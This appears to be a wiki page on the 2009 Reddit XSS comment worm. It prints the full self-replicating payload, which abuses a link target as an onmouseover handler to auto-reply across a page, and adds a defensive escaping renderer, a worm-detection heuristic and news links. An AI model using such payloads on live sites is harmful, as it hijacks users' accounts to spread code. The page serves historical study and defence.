XSS worm at reddit.com

From Hackipedia
Legend #1
Target: Reddit
Target Module:
Type: XSS

Reddit comments use a bbCode-style markup engine that lets users format their comments. In 2009 /u/xssfinder crafted the comment worm below, which spread itself across a page by replying to every comment on that page.


It was originally posted here (see also /r/proofofhax/):

https://www.reddit.com/r/funny/comments/9ol1l/guy_on_a_bike_in_new_york_high_fives_people

[x][b]
[b]:/[
z="[x][b]\n[b]:/["+this.innerHTML+"]{/onmouseover=eval(unescape(this.innerHTML))//}";
o=document;e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();
for(i=0;i<e.length;i++)e[i].value=z;
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
](/onmouseover=eval(unescape(this.innerHTML))//)
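The worm works because the link target in the comment markup ends up as an attribute that the browser treats as an event handler. As an added example (not Reddit's code, and not a reconstruction of its 2009 parser), the block below shows a link renderer that quotes and escapes the href and restricts it to http(s) or site-relative targets, so the payload above renders as an inert link, plus a small heuristic that flags comment bodies shaped like this worm. Function names and the sample comments are constructed for the example.

```javascript
// Added example (hypothetical names, not Reddit's code).

// HTML-escape a value for use inside a double-quoted attribute or as text.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;").replace(/"/g, "&quot;")
    .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Allow only http(s) URLs or site-relative paths; everything else becomes "#".
// Protocol-relative "//host" is rejected so a link cannot leave the site silently.
function safeHref(url) {
  const u = String(url).trim();
  if (/^https?:\/\//i.test(u) || (u.startsWith("/") && !u.startsWith("//"))) {
    return u;
  }
  return "#";
}

// Render a [text](url)-style link. The URL is always wrapped in quotes and
// escaped, so it can never close the href attribute or add an event handler;
// the worm's "/onmouseover=..." target just becomes a harmless relative path.
function renderLink(text, url) {
  return '<a href="' + escapeAttr(safeHref(url)) + '">' + escapeAttr(text) + "</a>";
}

// Heuristic signs of a self-replicating comment like the 2009 worm:
// an inline event handler in a link target, eval of the element's own markup,
// and DOM walking of reply links / save buttons. Two or more hits trips it.
const WORM_SIGNS = [
  /\(\s*\/?\s*on\w+\s*=/i,
  /eval\s*\(\s*unescape\s*\(\s*this\.innerHTML/i,
  /\.getElementsByTagName\(['"](a|button)['"]\)/i,
];

function looksLikeWorm(comment) {
  return WORM_SIGNS.filter((re) => re.test(comment)).length >= 2;
}

// Constructed sample inputs for a quick self-check.
const SAMPLE_WORM_COMMENT =
  "[x][b]\n[b]:/[ o=document;e=o.getElementsByTagName('a'); ]" +
  "(/onmouseover=eval(unescape(this.innerHTML))//)";
const SAMPLE_BENIGN_COMMENT = "See [this](https://example.com/page) for details.";
```

Running `renderLink("x", "/onmouseover=eval(unescape(this.innerHTML))//")` yields an anchor whose href is just that literal path, which is the point: quoting and escaping the attribute removes the injection regardless of what the URL contains.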

More here: https://www.reddit.com/r/programming/comments/9oopr/reddit_asploded_bummer_here_is_how_it_happened/
Article about it: http://mashable.com/2009/09/27/reddit-attack/#krHglsDbKmqV
The reporting post: https://www.reddit.com/r/reddit.com/comments/9oo1y/it_seems_like_someone_has_submitted_a_comment/
The response: http://www.theregister.co.uk/2009/09/28/reddit_xss_worm/
The aftermath: https://www.reddit.com/user/xssfinder